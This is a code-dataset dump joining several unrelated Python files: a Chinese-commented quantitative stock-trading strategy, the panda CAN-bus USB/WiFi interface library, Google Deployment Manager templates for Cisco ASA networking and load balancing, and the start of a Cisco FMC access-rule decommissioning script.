account.holdHb=list(set(account.holdHb) ^ set(temp))
return
# 定位函数
def dictLoc(dict,value):
i=0
for params in dict:
if value==params:
return i
i+=1
return -1
# RSI 计算
def getRSI(df):
return 100-100/(1+rs(df))
def rs(df):
up=df['up'][1:].mean()
down=df['down'][1:].mean()
if not down==0:
return -df['up'][1:].mean()/df['down'][1:].mean()
else:
return 0
# ATR 计算
def getATR(stock):
price = history(stock, ['close', 'high', 'low'], 20, '1d', False, 'pre', is_panel=1)
high = price['high']
low = price['low']
close = price['close']
return talib.ATR(np.array(high), np.array(low), np.array(close), timeperiod=14)
def trade_signal(account,data):
N = account.N
M = account.M
# 计算单个标的昨日的 RSRS
hz300_RSRS = get_RSRS(data,'000300.SH',N,M)
zz500_RSRS = get_RSRS(data,'000905.SH',N,M)
return [hz300_RSRS,zz500_RSRS]
#5.计算 RSRS
def get_RSRS(data,stock,n,m):
values = data.attribute_history(stock,['high','low'],n+m-1,'1d', skip_paused=True)
high_array = values.high.values[-(n+m-1):]
low_array = values.low.values[-(n+m-1):]
scores = np.zeros(m) #各期斜率
for i in range(m):
high = high_array[i:i+30]
low = low_array[i:i+30]
# 计算单期斜率
x = low #low 作为自变量
X = sm.add_constant(x) #添加常数变量
y = high #high 作为因变量
model = sm.OLS(y,X) #最小二乘法
results = model.fit()
score = results.params[1]
scores[i] = score
# 记录最后一期的 Rsquared(可决系数)
if i==m-1:
R_squared = results.rsquared
# 最近期的标准分
z_score = (scores[-1]-scores.mean())/scores.std()
# RSRS 得分
RSRS_socre = z_score*R_squared
return RSRS_socre
def getTend(account,signals):
#RSRS 大的标的 和值
signal = max(signals)
if signals[0]>signals[1]:
return True
else:
return False
#判断是否发生上、下穿
def checkthrough(a,b,terms=20):
#需要判断之前是否发生上穿
if a[len(a)-1]>b[len(b)-1]:
for i in range(min(terms-1,len(a)-1,len(b)-1)):
if a[len(a)-i-1]<b[len(b)-i-1]:
return 1,i
#需要判断之前是否发生下穿
elif a[len(a)-1]<b[len(b)-1]:
for i in range(min(terms-1,len(a)-1,len(b)-1)):
if a[len(a)-i-1]>b[len(b)-i-1]:
return -1,i
return 0,-1
#获取 stock 股票过去 terms 期,以 step 为步长的的收盘价
def getHistory(stock, terms,start=0,step='1d'):
close=history(stock, ['close'], terms+start, step, True,None)['close']
return close[0:terms]
#持仓到期处理
def delayCheck(data,account):
temp=[]
for stock in account.hold:
if (stock in account.holdSl) and (account.hold[stock] > account.a_periods):
log.info("持有到期卖出:"+stock)
trade_target(stock, 0)
if stock in account.hold:
temp.append(stock)
if stock in account.holdSl:
account.holdSl.remove(stock)
for stock in account.hold:
if (stock in account.holdSl) and (account.hold[stock] > account.b_periods):
log.info("持有到期卖出:"+stock)
trade_target(stock, 0)
if stock in account.hold:
temp.append(stock)
if stock in account.holdHb:
account.holdHb.remove(stock)
for stock in temp:
account.hold.pop(stock)
#大盘安全函数
# 时间获取用封装的函数
# 获取当前日期
def get_date():
return get_datetime().strftime("%Y%m%d")
# 获取星期几
def get_weekday():
date = get_date()
return datetime.datetime.strptime(date, "%Y%m%d").weekday()+1
# 获取时间
def get_time():
datatime=get_datetime()
datatime=pd.to_datetime(datatime, unit='s')
datatime=datatime.strftime('%Y-%m-%d %H:%M:%S')
timeArray=time.strptime(datatime,"%Y-%m-%d %H:%M:%S")
return time.strftime("%H%M", timeArray)
# =======================
# 策略 A(shortLine)
# --------------------------------------
# 买入判断
def a_buyCheck(stock, account):
buypoint = a_condition_MA_b(stock)+a_condition_Flow_b(stock)+a_condition_Volume_b(stock)+a_condition_KDJ_b(stock)+a_condition_WeekTor_b(stock)
if buypoint > 3 and len(account.holdSl)<10:
atr = getATR(stock)
if not isNaN(atr[-1]):
#amount = int(account.cash/(atr[-1]*20))
trade_value(stock,min(1000000,800000*atr[-1])) #按量买入
# trade_amount(stock,amount) #按量买入
account.holdSl.append(stock) #添加记录
log.info("波段买入"+stock)
return
# MA 条件
def a_condition_MA_b(stock):
# 符合 MA5>MA10>MA20
price = history(stock, ['open', 'close'], 20, '1d', False, 'pre', is_panel=1)
close = price['close']
MA5 = talib.MA(np.array(close), timeperiod=5)
MA10 = talib.MA(np.array(close), timeperiod=10)
MA20 = talib.MA(np.array(close), timeperiod=20)
#if(MA5[-1] > MA10[-1]):
if(MA5[-1] > MA10[-1]) and (MA10[-1] > MA20[-1]):
return 1
else:
return 0
# 资金净流条件
def a_condition_Flow_b(stock):
date = get_date()
j = get_weekday()
# 连续两周主力资金净流入大于 0
delta = datetime.timedelta(days=j)
start1 = (get_last_datetime()-delta).strftime("%Y%m%d")
# flow1 为从 start1 到 date 为止的换手率
flow1 = get_money_flow([stock], start1, date, ['net_flow_rate'], count=None,is_panel=0)
this_week = sum(flow1[stock].net_flow_rate)
start2 = (get_last_datetime()-datetime.timedelta(days=j+7)).strftime("%Y%m%d")
end2 = (get_last_datetime()-datetime.timedelta(days=j+1)).strftime("%Y%m%d")
# flow1 为从 start1 到 date 为止的换手率
flow2 = get_money_flow([stock], start2, end2, ['net_flow_rate'], count=None,is_panel=0)
last_week = sum(flow2[stock].net_flow_rate)
if (this_week > 0) and (last_week > 0):
return 1
else:
return 0
# 成交量条件
def a_condition_Volume_b(stock):
# 当前周成交量大于上一周成交量的 1.5 倍
date = get_date()
# 获取历史周级数据
weekdata = get_candle_stick(stock, end_date=date, fre_step='week', fields=['volume'], skip_paused=False, fq='pre', bar_count=20, is_panel=1)
volume = weekdata.iloc[:, 0]
if volume[-1] > 1.5*volume[-2]:
return 1
else:
return 0
# KDJ 条件
def a_condition_KDJ_b(stock):
price = history(stock, ['close', 'high', 'low'], 20, '1d', False, 'pre', is_panel=1)
high = price['high']
low = price['low']
close = price['close']
K, D = talib.STOCH(np.array(high), np.array(low),
np.array(close), 9, 3, 0, 3, 0)
if(K[-1] > K[-2]) and (K[-2] < D[-2]) and (K[-1] > D[-1]):
return 1
else:
return 0
# 换手条件
def a_condition_WeekTor_b(stock):
# 周换手率超过 15%,符合则赋值 1,否则赋值 0
j = get_weekday()
price = history(stock, ['turnover_rate'], 20, '1d', False, 'pre', is_panel=1)
turnover_rate = price['turnover_rate']
weektor = sum(turnover_rate[-5:])
if(weektor > 0.15):
return 1
else:
return 0
# --------------------------------------
# 卖出判断
def a_sellCheck(account,data):
for stock in account.holdSl:
if stock in account.hold:
sellPoint = a_condition_MA_s(stock)+a_condition_Flow_s(stock)+a_condition_RSI_s(stock)+a_condition_Quate_s(stock,data)
temp=[]
if sellPoint >= 1:
if stock in account.holdSl:
# 平仓
id=order_target(stock,0)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
else:
log.info("波段卖点卖出"+stock)
temp.append(stock)
account.holdSl=list(set(account.holdSl) ^ set(temp))
account.hold.pop(stock)
return
# MA 条件
def a_condition_MA_s(stock):
# 符合 MA5 下穿 MA10
price = history(stock, ['close'],20, '1d', False, 'pre', is_panel=1)
close = price['close']
MA5 = talib.MA(np.array(close), timeperiod=5)
MA10 = talib.MA(np.array(close), timeperiod=10)
if checkthrough(MA5,MA10)[0] ==-1:
return 1
else:
return 0
# 资金净流条件
def a_condition_Flow_s(stock):
# 周主力资金净流入小于 0
delta = datetime.timedelta(days=get_weekday())
start = (get_datetime() - delta).strftime("%Y%m%d")
flow = get_money_flow([stock], start, get_date(), ['net_flow_rate'], count=None, is_panel=0)
this_week = sum(flow[stock].net_flow_rate)
if this_week < 0:
return 1
else:
return 0
# RSI 条件
def a_condition_RSI_s(stock):
# 日线 RSI 出现卖点信号
price = history(stock, ['close'],20, '1d', False, 'pre', is_panel=1)
close = price['close']
RSI1 = talib.RSI(np.array(close), timeperiod=5)
RSI2 = talib.RSI(np.array(close), timeperiod=13)
if(RSI1[-1] < RSI1[-2]) and (RSI1[-1] < RSI2[-1]) and (RSI1[-2] > RSI2[-2]):
return 1
else:
return 0
def a_condition_Quate_s(stock,data):
if(len(data.history(stock, 'close', 2, '1d', True, None)[stock]['close']))>0:
begin = data.history(stock, 'close', 2, '1d', True, None)[stock]['close'][0]
now=data.history(stock, 'open', 2, '1d', True, None)[stock]['open'][0]
if now/begin < 0.97:
# log.info("b_1d")
return 1
else:
return 0
return 0
# --------------------------------------
# 风控
def a_riskDefend(account):
condition = 0
# 涨幅
quote_rate = history('000001.SH', ['quote_rate'],10, '1d', False, 'pre', is_panel=1)['quote_rate']
if len(quote_rate)>1:
if quote_rate[-1]<-2.5:
condition += 1
if quote_rate[-1]<-2 and quote_rate[-2]<-2:
condition += 1
# 停牌判断
suspension = 0
for stock in (get_all_securities('stock', get_date()).index):
#这里把原来的 1d 改成了 1m,从取昨天的变成取今天的了
paused = history(stock, ['is_paused'], 5, '1m', False,'pre',is_panel=1)['is_paused']
if len(paused)>0 and paused[0]==1:
suspension+=1
if suspension > 20:
#log.info("停牌条件风控")
condition += 1
temp=[]
if condition > 0:
for stock in account.holdSl:
if stock in account.hold:
id=order_target(stock,0)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
else:
log.info("波段风控卖出"+stock)
account.holdSl.remove(stock)
account.hold.pop(stock)
# #重置 account.holdSl
# account.holdSl = list(set(account.holdSl) ^ set(temp))
# =======================
# 策略 B(hitBoard)
# --------------------------------------
# 买入判断
def b_buyCheck(stock,data):
v=data.current(stock)[stock]
close=v.prev_close
begin=v.open
#这里数值范围要讨论
gains=(begin-close)/close
if gains>0.05 or gains<-0.02:
return -1
elif gains>=-0.02 and gains<=0.02:
return 0
elif gains>0.02 and gains<=0.05:
return 1
# return 0
# 流通股本
def b_getMarket(stock):
q = query(
factor.date,
# factor.circulating_cap
factor.current_market_cap
).filter(
factor.symbol == stock,
factor.date == get_date()
)
if len(get_factors(q)['factor_current_market_cap'])==0:
return 0
elif get_factors(q)['factor_current_market_cap'][0] is None:
return 0
else:
return get_factors(q)['factor_current_market_cap'][0]
def b_getKDJ(stock):
price = history(stock, ['close', 'high', 'low'], 20, '1d', False, 'pre', is_panel=1)
high = price['high']
low = price['low']
close = price['close']
K, D = talib.STOCH(np.array(high), np.array(low),np.array(close), 9, 3, 0, 3, 0)
J=3*K-2*D
return (K[-1]+D[-1]+J[-1])/3
# --------------------------------------
# 卖出判断
def b_sellCheck(stock,data,account):
if stock in account.hold:
amount=account.positions[stock].total_amount
if b_riskDefend(stock,data):
order(stock,0,style="MarketOrder")
log.info("超短风控卖出"+stock)
account.holdHb.pop(dictLoc(account.holdHb,stock))
account.hold.pop(stock)
elif b_rsiCheck(stock,data) or b_runtimeTrCheck(stock,data) or b_stopGains(stock,data):
order(stock,0,style="MarketOrder")
log.info("超短卖点卖出"+stock)
account.holdHb.pop(dictLoc(account.holdHb,stock))
account.hold.pop(stock)
return
# 止盈
def b_stopGains(stock,data):
if(len(data.history(stock, 'close', 1, '1d', True, None)[stock]['close']))>0:
begin = data.history(stock, 'close', 1, '1d', True, None)[stock]['close'][0]
v=data.current(stock)[stock]
now=v.open
if now/begin >= 1.09:
# log.info("b_1d")
return True
else:
return False
return True
# rsi 判断
def b_rsiCheck(stock,data):
terms=8
RSI=pd.DataFrame({'rsi1':np.zeros(terms),'rsi2':np.zeros(terms)})
for i in range(terms):
rsi1=getRSI(b_deltaCalc(getHistory(stock,6,i,'60m'),data))
rsi2=getRSI(b_deltaCalc(getHistory(stock,12,i,'60m'),data))
RSI.ix[i,'rsi1']=rsi1
RSI.ix[i,'rsi2']=rsi2
flag=checkthrough(RSI['rsi1'],RSI['rsi2'])[0]
if flag==-1:
return True
else:
return False
#换手率
def b_runtimeTrCheck(stock,data):
#log.info(get_datetime())
if len(data.history(stock,'turnover_rate',1,'1m',True,None)[stock]['turnover_rate'])==0 or len(data.history(stock,'turnover_rate',1,'1d',True,None)[stock]['turnover_rate'])==0:
return False
#前日换手量
else:
exc_y=data.history(stock,'turnover_rate',1,'1d',True,None)[stock]['turnover_rate'][0]/(4*60)
exc_n=data.history(stock,'turnover_rate',1,'1m',True,None)[stock]['turnover_rate'][0]
if exc_n>1.3*exc_y:
return True
else:
return False
#涨跌量的计算
def b_deltaCalc(close,data):
df=pd.DataFrame({'close':close,'up':np.zeros(len(close)),'down':np.zeros(len(close))})
for i in range(len(df)):
if i==0:
df.ix[i,'up']=0
df.ix[i,'down']=0
else:
if df.ix[i,'close']-df.ix[i-1,'close']>0:
df.ix[i,'up']=df.ix[i,'close']-df.ix[i-1,'close']
if df.ix[i,'close']-df.ix[i-1,'close']<0:
df.ix[i,'down']=df.ix[i,'close']-df.ix[i-1,'close']
return df
# --------------------------------------
# 风控
#单日跌幅 2.5%,双日跌 4%
def b_riskDefend(stock, data):
#条件一:单日跌幅超过 2%
if(len(data.history(stock, 'close', 1, '1d', True, None)[stock]['close']))>0:
begin = data.history(stock, 'close', 1, '1d', True, None)[stock]['close'][0]
v=data.current(stock)[stock]
now=v.open
if now/begin < 0.975:
# log.info("b_1d")
return True
else:
#两日 3.5%
begin = data.history(stock, 'close', 2, '1d', True, None)[stock]['close'][0]
v=data.current(stock)[stock]
now=v.open
if now/begin < 0.965:
# log.info("b_2d")
return True
else:
return False
def b_prevRiskDefend(stock,data):
#条件一:单日跌幅超过 2%
if(len(data.history(stock, 'close', 2, '1d', True, None)[stock]['close']))>0:
begin = data.history(stock, 'close', 2, '1d', True, None)[stock]['close'][0]
now=data.history(stock, 'open', 2, '1d', True, None)[stock]['open'][0]
if now/begin < 0.97:
# log.info("b_1d")
return True
return False
``` |
{
"source": "1335654481ren/panda",
"score": 3
} |
#### File: panda/panda/__init__.py
```python
from __future__ import print_function
import binascii
import struct
import hashlib
import socket
import usb1
__version__ = '0.0.2'
class PandaHashMismatchException(Exception):
def __init__(self, hash_, expected_hash):
super(PandaHashMismatchException, self).__init__(
"Hash '%s' did not match the expected hash '%s'"%\
(binascii.hexlify(hash_), binascii.hexlify(expected_hash)))
def parse_can_buffer(dat):
ret = []
for j in range(0, len(dat), 0x10):
ddat = dat[j:j+0x10]
f1, f2 = struct.unpack("II", ddat[0:8])
extended = 4
if f1 & extended:
address = f1 >> 3
else:
address = f1 >> 21
ret.append((address, f2>>16, ddat[8:8+(f2&0xF)], (f2>>4)&0xf))
return ret
class PandaWifiStreaming(object):
def __init__(self, ip="192.168.0.10", port=1338):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.sendto("hello", (ip, port))
self.sock.setblocking(0)
self.ip = ip
self.port = port
def can_recv(self):
ret = []
while True:
try:
dat, addr = self.sock.recvfrom(0x200*0x10)
if addr == (self.ip, self.port):
ret += parse_can_buffer(dat)
except socket.error:
break
return ret
# stupid tunneling of USB over wifi and SPI
class WifiHandle(object):
def __init__(self, ip="192.168.0.10", port=1337):
self.sock = socket.create_connection((ip, port))
def __recv(self):
ret = self.sock.recv(0x44)
length = struct.unpack("I", ret[0:4])[0]
return ret[4:4+length]
def controlWrite(self, request_type, request, value, index, data, timeout=0):
# ignore data in reply, panda doesn't use it
return self.controlRead(request_type, request, value, index, 0, timeout)
def controlRead(self, request_type, request, value, index, length, timeout=0):
self.sock.send(struct.pack("HHBBHHH", 0, 0, request_type, request, value, index, length))
return self.__recv()
def bulkWrite(self, endpoint, data, timeout=0):
if len(data) > 0x10:
raise ValueError("Data must not be longer than 0x10")
self.sock.send(struct.pack("HH", endpoint, len(data))+data)
self.__recv() # to /dev/null
def bulkRead(self, endpoint, length, timeout=0):
self.sock.send(struct.pack("HH", endpoint, 0))
return self.__recv()
def close(self):
self.sock.close()
class Panda(object):
REQUEST_TYPE = usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE
def __init__(self, serial=None, claim=True):
if serial == "WIFI":
self._handle = WifiHandle()
print("opening WIFI device")
else:
context = usb1.USBContext()
self._handle = None
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
if serial is None or device.getSerialNumber() == serial:
print("opening device", device.getSerialNumber())
self._handle = device.open()
if claim:
self._handle.claimInterface(0)
self._handle.setInterfaceAltSetting(0, 0)
break
assert self._handle != None
def close(self):
self._handle.close()
@staticmethod
def list():
context = usb1.USBContext()
ret = []
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
ret.append(device.getSerialNumber())
# TODO: detect if this is real
#ret += ["WIFI"]
return ret
# ******************* health *******************
def health(self):
dat = self._handle.controlRead(Panda.REQUEST_TYPE, 0xd2, 0, 0, 13)
a = struct.unpack("IIBBBBB", dat)
return {"voltage": a[0], "current": a[1],
"started": a[2], "controls_allowed": a[3],
"gas_interceptor_detected": a[4],
"started_signal_detected": a[5],
"started_alt": a[6]}
# ******************* control *******************
def enter_bootloader(self):
try:
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xd1, 0, 0, b'')
except Exception as e:
print(e)
pass
def get_serial(self):
dat = self._handle.controlRead(Panda.REQUEST_TYPE, 0xd0, 0, 0, 0x20)
hashsig, calc_hash = dat[0x1c:], hashlib.sha1(dat[0:0x1c]).digest()[0:4]
if hashsig != calc_hash:
raise PandaHashMismatchException(calc_hash, hashsig)
return [dat[0:0x10], dat[0x10:0x10+10]]
def get_secret(self):
return self._handle.controlRead(Panda.REQUEST_TYPE, 0xd0, 1, 0, 0x10)
# ******************* configuration *******************
def set_controls_allowed(self, on):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xdc, (0x1337 if on else 0), 0, b'')
def set_gmlan(self, on, bus=2):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xdb, 1, bus, b'')
def set_uart_baud(self, uart, rate):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xe1, uart, rate, b'')
def set_uart_parity(self, uart, parity):
# parity, 0=off, 1=even, 2=odd
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xe2, uart, parity, b'')
def set_uart_callback(self, uart, install):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xe3, uart, int(install), b'')
# ******************* can *******************
def can_send_many(self, arr):
snds = []
transmit = 1
extended = 4
for addr, _, dat, bus in arr:
assert len(dat) <= 8
if addr >= 0x800:
rir = (addr << 3) | transmit | extended
else:
rir = (addr << 21) | transmit
snd = struct.pack("II", rir, len(dat) | (bus << 4)) + dat
snd = snd.ljust(0x10, b'\x00')
snds.append(snd)
while True:
try:
print("DAT: %s"%b''.join(snds).__repr__())
self._handle.bulkWrite(3, b''.join(snds))
break
except (usb1.USBErrorIO, usb1.USBErrorOverflow):
print("CAN: BAD SEND MANY, RETRYING")
def can_send(self, addr, dat, bus):
self.can_send_many([[addr, None, dat, bus]])
def can_recv(self):
dat = bytearray()
while True:
try:
dat = self._handle.bulkRead(1, 0x10*256)
break
except (usb1.USBErrorIO, usb1.USBErrorOverflow):
print("CAN: BAD RECV, RETRYING")
return parse_can_buffer(dat)
# ******************* serial *******************
def serial_read(self, port_number):
return self._handle.controlRead(Panda.REQUEST_TYPE, 0xe0, port_number, 0, 0x40)
def serial_write(self, port_number, ln):
return self._handle.bulkWrite(2, chr(port_number) + ln)
# ******************* kline *******************
# pulse low for wakeup
def kline_wakeup(self):
self._handle.controlWrite(Panda.REQUEST_TYPE, 0xf0, 0, 0, b'')
def kline_drain(self, bus=2):
# drain buffer
bret = bytearray()
while True:
ret = self._handle.controlRead(Panda.REQUEST_TYPE, 0xe0, bus, 0, 0x40)
if len(ret) == 0:
break
bret += ret
return bytes(bret)
def kline_ll_recv(self, cnt, bus=2):
echo = bytearray()
while len(echo) != cnt:
echo += self._handle.controlRead(Panda.REQUEST_TYPE, 0xe0, bus, 0, cnt-len(echo))
return echo
def kline_send(self, x, bus=2, checksum=True):
def get_checksum(dat):
result = 0
result += sum(map(ord, dat))
result = -result
return chr(result&0xFF)
self.kline_drain(bus=bus)
if checksum:
x += get_checksum(x)
for i in range(0, len(x), 0xf):
ts = x[i:i+0xf]
self._handle.bulkWrite(2, chr(bus).encode()+ts)
echo = self.kline_ll_recv(len(ts), bus=bus)
if echo != ts:
print("**** ECHO ERROR %d ****" % i)
print(binascii.hexlify(echo))
print(binascii.hexlify(ts))
assert echo == ts
def kline_recv(self, bus=2):
msg = self.kline_ll_recv(2, bus=bus)
msg += self.kline_ll_recv(ord(msg[1])-2, bus=bus)
return msg
``` |
{
"source": "1336996/secure-firewall",
"score": 2
} |
#### File: Deployment-Manager/templates/load_balancer.py
```python
from helpers import common
def getHealthCheck(name, region):
return {
'name': name,
'type': common.REGION_HEALTH_CHECKS_TYPE,
'properties': {
'description': 'Deployment Manager Managed.',
'type': 'TCP',
'checkIntervalSec': 1,
'timeoutSec': 1,
'healthyThreshold': 4,
'unhealthyThreshold': 5,
'region': region,
'tcpHealthCheck': {
'port': 22
}
}
}
def getExtRegionBackendService(instanceGroups, healthCheckName, region):
backend_service = {
'name': 'asa-region-be-ext',
'type': common.REGION_BACKEND_SERVICES_TYPE,
'properties': {
'description': 'Deployment Manager managed external backend service for ASA.',
'region': region,
'loadBalancingScheme': 'EXTERNAL',
'protocol': 'TCP',
'timeoutSec': 10,
'healthChecks': [
f"$(ref.{healthCheckName}.selfLink)"
],
'portName': 'http',
'backends': [
{
'balancingMode': 'CONNECTION',
'description': 'Deployment Manager managed instance group for ASA.',
'group': f"$(ref.{ig['name']}.selfLink)"
}
for ig in instanceGroups
]
}
}
return backend_service
def getIntRegionBackendService(instanceGroups, healthCheckName, region, internalNetwork):
backend_service = {
'name': 'asa-region-be-int',
'type': common.REGION_BACKEND_SERVICES_TYPE,
'properties': {
'description': 'Deployment Manager managed internal backend service for ASA.',
'region': region,
'loadBalancingScheme': 'INTERNAL',
'protocol': 'TCP',
'network': f'$(ref.{internalNetwork}.selfLink)',
'healthChecks': [
f"$(ref.{healthCheckName}.selfLink)"
],
'backends': [
{
'balancingMode': 'CONNECTION',
'description': 'Deployment Manager managed instance group for ASA.',
'group': f"$(ref.{ig['name']}.selfLink)"
}
for ig in instanceGroups
]
}
}
return backend_service
def getInstanceGroups(context):
igs = []
for i in range(context.properties['num_instances']):
igs.append({
'name': common.getInstanceGroupName('uig-asa', i+1),
'type': common.INSTANCE_GROUP_TYPE,
'properties': {
'zone': context.properties['vm_zones'][i],
'namedPorts': [
{
'name': named_port['name'],
'port': named_port['port']
}
for named_port in context.properties['named_ports']
]
}
})
return igs
def getAddVMsToIG(context, instanceGroups):
actions = []
for i in range(context.properties['num_instances']):
ig = instanceGroups[i]
zone = context.properties['vm_zones'][i]
vm_name = common.getInstanceName(common.INSTANCE_PREFIX, i+1)
project = context.env['project']
selfLink = f"{common.COMPUTE_URL_BASE}projects/{project}/zones/{zone}/instances/{vm_name}"
actions.append({
'name': f"ig-{ig['name']}-members",
'action': common.ADD_INSTANCES_TYPE,
'properties': {
'zone': zone,
'project': project,
'instanceGroup': ig['name'],
'instances': [
{
'instance': selfLink
}
]
},
'metadata': {
'dependsOn': [ig['name'], vm_name]
}
})
return actions
def getExtForwardingRule(context, backendService):
return {
'name': 'asa-ext-fr',
'type': common.FORWARDING_RULE_TYPE,
'properties': {
'region': context.properties['region'],
'loadBalancingScheme': 'EXTERNAL',
'portRange': context.properties['service_port'],
'backendService': f"$(ref.{backendService['name']}.selfLink)"
}
}
def getIntForwardingRule(context, backendService):
internalNetwork = context.properties['inside_network']
return {
'name': 'asa-int-fr',
'type': common.FORWARDING_RULE_TYPE,
'properties': {
'region': context.properties['region'],
'loadBalancingScheme': 'INTERNAL',
'network': f'$(ref.{internalNetwork}.selfLink)',
'subnetwork': f'$(ref.{common.getSubnetName(internalNetwork)}.selfLink)',
'allowGlobalAccess': context.properties['allow_global_access'],
'ports': [
context.properties['service_port']
],
'backendService': f"$(ref.{backendService['name']}.selfLink)"
}
}
def GenerateConfig(context):
region = context.properties['region']
healthCheckName = common.getHealthCheckName('ssh', region)
intNetwork = context.properties['inside_network']
resources = []
outputs = []
# Create Unmanaged Instance Groups. One per instance
igs = getInstanceGroups(context)
# Add Health Check to be used
resources.append(getHealthCheck(healthCheckName, region))
# Add External Regional Backend Service using the created unmanaged instance groups
extBackendService = getExtRegionBackendService(igs, healthCheckName, region)
resources.append(extBackendService)
# Add the Unmanaged Instance Groups
resources.extend(igs)
# Add the created intances to their respective unmanaged instance groups
resources.extend(getAddVMsToIG(context, igs))
# Add External Forwarding Rule
extForwardingRule = getExtForwardingRule(context, extBackendService)
resources.append(extForwardingRule)
if context.properties['use_internal_lb']:
# Add Internal Regional Backend Service using the created unmanaged instance groups
intBackendService = getIntRegionBackendService(igs, healthCheckName, region, intNetwork)
resources.append(intBackendService)
# Add Internal Forwarding Rule
intForwardingRule = getIntForwardingRule(context, intBackendService)
resources.append(intForwardingRule)
# Add ILB ip address to outputs
outputs.append({
'name': 'internal_lb_ip',
'value': '$(ref.' + intForwardingRule['name'] + '.IPAddress)'
})
outputs.append({
'name': 'external_lb_ip',
'value': '$(ref.' + extForwardingRule['name'] + '.IPAddress)'
})
return {
'resources': resources,
'outputs': outputs
}
```
#### File: Deployment-Manager/templates/networking.py
```python
from helpers import common
###################################
# VPC Networks and Firewall Rules
###################################
def getNetworkSelfLink(context, network):
return f"$(ref.{context.properties[network]}.selfLink)"
def GetNetwork(name, autoCreateSubnetworks):
network = {
'name': name,
'type': common.NETWORK_TYPE,
'properties':{
'autoCreateSubnetworks': autoCreateSubnetworks,
"routingConfig": {
"routingMode": 'GLOBAL'
}
}
}
return network
def GetSubNetwork(name, network, ipCidrRange, region, privateAccess, flowLogs):
subnet = {
'name': name,
'type': common.SUBNETWORK_TYPE,
'properties':{
'network': network,
'ipCidrRange': ipCidrRange,
'region': region,
'privateIpGoogleAccess': privateAccess,
'enableFlowLogs': flowLogs
}
}
return subnet
def GetFirewallRule(context, name, network, protocol, ports, sourceRanges):
firewall_rule = {
'name': name,
'type': common.FIREWALL_TYPE,
'properties':{
'network': network,
'sourceRanges': sourceRanges,
'allowed': [
{
'IPProtocol': protocol,
'ports': ports
}
],
'targetServiceAccounts': [context.properties['service_account']]
}
}
return firewall_rule
def GenerateConfig(context):
resources = []
networks_map = {}
for network in context.properties['networks']:
network_name = network['name']
resources.append(GetNetwork(network_name, False))
resources.append(GetSubNetwork(
common.getSubnetName(network_name),
f"$(ref.{network_name}.selfLink)",
network['cidr'],
context.properties['region'],
True,
False
))
# Management Firewall rules
if 'mgmt_network' in context.properties:
mgmt_self_link = getNetworkSelfLink(context, 'mgmt_network')
resources.append(GetFirewallRule(
context,
'allow-ssh-mgmt',
mgmt_self_link,
common.TCP_PROTOCOL,
["22"],
["0.0.0.0/0"]
))
resources.append(GetFirewallRule(
context,
'allow-https-mgmt',
mgmt_self_link,
common.TCP_PROTOCOL,
["443"],
["0.0.0.0/0"]
))
resources.append(GetFirewallRule(
context,
'allow-service-port-mgmt',
mgmt_self_link,
common.TCP_PROTOCOL,
[context.properties['service_port']],
["0.0.0.0/0"]
))
# Inside Firewall rules
if 'inside_network' in context.properties:
inside_self_link = getNetworkSelfLink(context, 'inside_network')
resources.append(GetFirewallRule(
context,
'allow-ssh-inside',
inside_self_link,
common.TCP_PROTOCOL,
["22"],
["0.0.0.0/0"]
))
resources.append(GetFirewallRule(
context,
'allow-service-port-inside',
inside_self_link,
common.TCP_PROTOCOL,
[context.properties['service_port']],
["0.0.0.0/0"]
))
# Outside Firewall rules
if 'outside_network' in context.properties:
outside_self_link = getNetworkSelfLink(context, 'outside_network')
resources.append(GetFirewallRule(
context,
'allow-ssh-outside',
outside_self_link,
common.TCP_PROTOCOL,
["22"],
["0.0.0.0/0"]
))
resources.append(GetFirewallRule(
context,
'allow-service-port-outside',
outside_self_link,
common.TCP_PROTOCOL,
[context.properties['service_port']],
["0.0.0.0/0"]
))
# map for networks
networks_map = {
f"{network['name']}" : {
'name': network['name'],
'appliance_ip': network['appliance_ip'],
'external_ip': network['external_ip'],
'network_self_link': f"$(ref.{network['name']}.selfLink)",
'subnet_self_link': f"$(ref.{common.getSubnetName(network['name'])}.selfLink)"
}
for network in context.properties['networks']
}
# networks_list = []
# for network in context.properties['networks']:
# networks_list.append({
# 'name': network['name'],
# 'appliance_ip': network['appliance_ip'],
# 'external_ip': network['external_ip'],
# 'subnet_self_link': f"$(ref.{network['name']}.subnetworks[0])"
# })
outputs = [
{
'name': 'networks_map',
'value': networks_map
}
]
return {'resources': resources, 'outputs': outputs}
```
#### File: Automation_Scripts/decomission_AccessRules/decomission.py
```python
import requests
import argparse
from requests.auth import HTTPBasicAuth
import urllib3
import csv
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def createParser ():
parser = argparse.ArgumentParser()
parser.add_argument("--addr", required=True, help="Address of Cisco FMC")
parser.add_argument("--username", required=True, help="Username of Cisco FMC")
parser.add_argument("--password", required=True, help="Password of Cisco FMC")
parser.add_argument("--policy_name", required=True, help="Access policy name")
parser.add_argument("--ip", nargs="+", required=True,
help="Ip or network object id (list). "
"Example: -- ip 0.0.0.0 dde11d62-288b-4b4c-92e0-1dad0496f14b")
parser.add_argument("--delete", nargs='?', const=True, type=bool, help="Argument to be used if the rules should be deleted")
return parser
def fmc_gen_token():
api_uri = "/api/fmc_platform/v1/auth/generatetoken"
url = "https://" + args.addr + api_uri
response = requests.post(
url,
verify=False,
auth=HTTPBasicAuth(args.username, args.password),
)
return {
"X-auth-access-token": response.headers["X-auth-access-token"],
"X-auth-refresh-token": response.headers["X-auth-refresh-token"],
"DOMAIN_UUID": response.headers["DOMAIN_UUID"]
}
def get_policy_assignment(fmc_token):
api_uri: str = f'/api/fmc_config/v1/domain/{fmc_token["DOMAIN_UUID"]}/policy/accesspolicies'
url = "https://" + args.addr + api_uri
headers = {
"X-auth-access-token": fmc_token["X-auth-access-token"],
'Content-Type': 'application/json'
}
response = requests.get(
url + f"?name={args.policy_name}",
headers=headers,
verify=False
)
